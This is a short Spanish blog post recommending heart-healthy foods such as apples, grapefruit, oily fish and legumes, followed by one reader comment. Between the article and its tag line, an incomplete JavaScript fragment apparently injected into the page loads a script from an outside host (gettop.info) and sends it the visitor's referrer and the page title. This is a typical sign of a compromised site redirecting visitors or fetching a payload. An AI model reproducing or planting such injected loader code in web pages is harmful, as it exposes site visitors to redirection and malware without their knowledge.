Salud y belleza » Alimentación, Salud, alimentos, dieta saludable

Alimentos beneficiosos para el corazón

1 Comentario

manzana-salud-corazonYa te hemos explicado cuáles son los alimentos más perjudiciales para el corazón. Después de evitar consumir estos alimentos, si quieres seguir cuidando tu salud cardiovascular debes saber cuáles son los alimentos más beneficiosos para el corazón. Lo importante es llevar una dieta sana y equilibrada, pero además existen ciertos productos que mejoran la salud cardíaca.

Uno de esos alimentos sanos para cuidar el corazón son, por ejemplo, las manzanas. Es una fruta muy beneficiosa para el corazón. Es recomendable tomarla a diario, en zumo o fruta natural. Esta fruta evita la oxidación del organismo y la acumulación de grasas en venas y arterias gracias a su cáscara.

El pomelo también es otra fruta muy beneficiosa para el corazón. También es rico en antioxidantes, por lo que ayuda a reducir el riesgo de padecer enfermedades cardíacas. Lo recomendable es tomar, como mínimo, medio pomelo cuatro días a la semana.

Otro alimento que ayuda mucho al corazón es el pescado gracias a su alto contenido en Omega 3 que permite que los niveles de triglicéridos de la sangre disminuyan. Los más recomendables son el salmón, las sardinas o la caballa.

pescado-corazon

Por último, las legumbres también son un alimento que permite bajar el colesterol malo y son ricas en fibra. Es recomendable consumir un plato de legumbres varias veces por semana.

¿Tomas a menudo estos alimentos? ¿Tienes un corazón sano?

if (document.currentScript) { s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

One Comment »

  • Tania said:

    Yo suelo seguir todos estos consejos porque es importante cuidarse. Gracias

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.